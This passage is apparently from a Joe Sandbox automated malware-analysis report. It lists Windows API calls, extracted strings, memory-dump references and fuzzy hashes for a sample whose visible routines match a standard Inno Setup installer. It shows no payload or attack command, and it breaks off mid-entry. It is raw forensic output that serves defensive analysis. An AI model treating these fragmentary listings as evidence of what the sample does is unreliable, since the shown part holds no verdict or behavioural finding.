                                                                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 4283692357-0
                                                                                                    • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                    • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                    • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                    • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 2227064392-0
                                                                                                    • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                    • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                    • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                    • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 215268677-0
                                                                                                    • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                    • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                    • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                    • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                    APIs
                                                                                                    • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                    • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                    • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                    • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 2280970139-0
                                                                                                    • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                    • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                    • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                    • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                    APIs
                                                                                                    • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocHandleLockUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2167344118-0
                                                                                                    • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                    • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                    • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                    • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                    APIs
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                    Strings
                                                                                                    • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                    • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                    • API String ID: 3535843008-1938159461
                                                                                                    • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                    • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                    • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                    • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                    • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                    Strings
                                                                                                    • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveForeground
                                                                                                    • String ID: Will not restart Windows automatically.
                                                                                                    • API String ID: 307657957-4169339592
                                                                                                    • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                    • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                    • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                    • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                    APIs
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                    • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                    Strings
                                                                                                    • Extracting temporary file: , xrefs: 004763EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileTime$Local
                                                                                                    • String ID: Extracting temporary file:
                                                                                                    • API String ID: 791338737-4171118009
                                                                                                    • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                    • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                                    • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                    • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                                    Strings
                                                                                                    • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                    • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                    • API String ID: 0-1974262853
                                                                                                    • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                    • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                                    • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                    • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                                    • %s\%s_is1, xrefs: 00478F10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                    • API String ID: 47109696-1598650737
                                                                                                    • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                    • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                                    • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                    • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                                    • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMessageSendShell
                                                                                                    • String ID: open
                                                                                                    • API String ID: 812272486-2758837156
                                                                                                    • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                    • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                                    • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                    • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                                    APIs
                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                    • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                    • String ID: <
                                                                                                    • API String ID: 893404051-4251816714
                                                                                                    • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                    • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                    • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                    • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                      • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                    • String ID: )
                                                                                                    • API String ID: 2227675388-1084416617
                                                                                                    • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                    • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                    • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                    • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window
                                                                                                    • String ID: /INITPROCWND=$%x $@
                                                                                                    • API String ID: 2353593579-4169826103
                                                                                                    • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                    • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                    • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                    • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocByteCharFreeMultiWide
                                                                                                    • String ID: NIL Interface Exception$Unknown Method
                                                                                                    • API String ID: 3952431833-1023667238
                                                                                                    • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                    • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                    • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                    • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                    • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                      • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
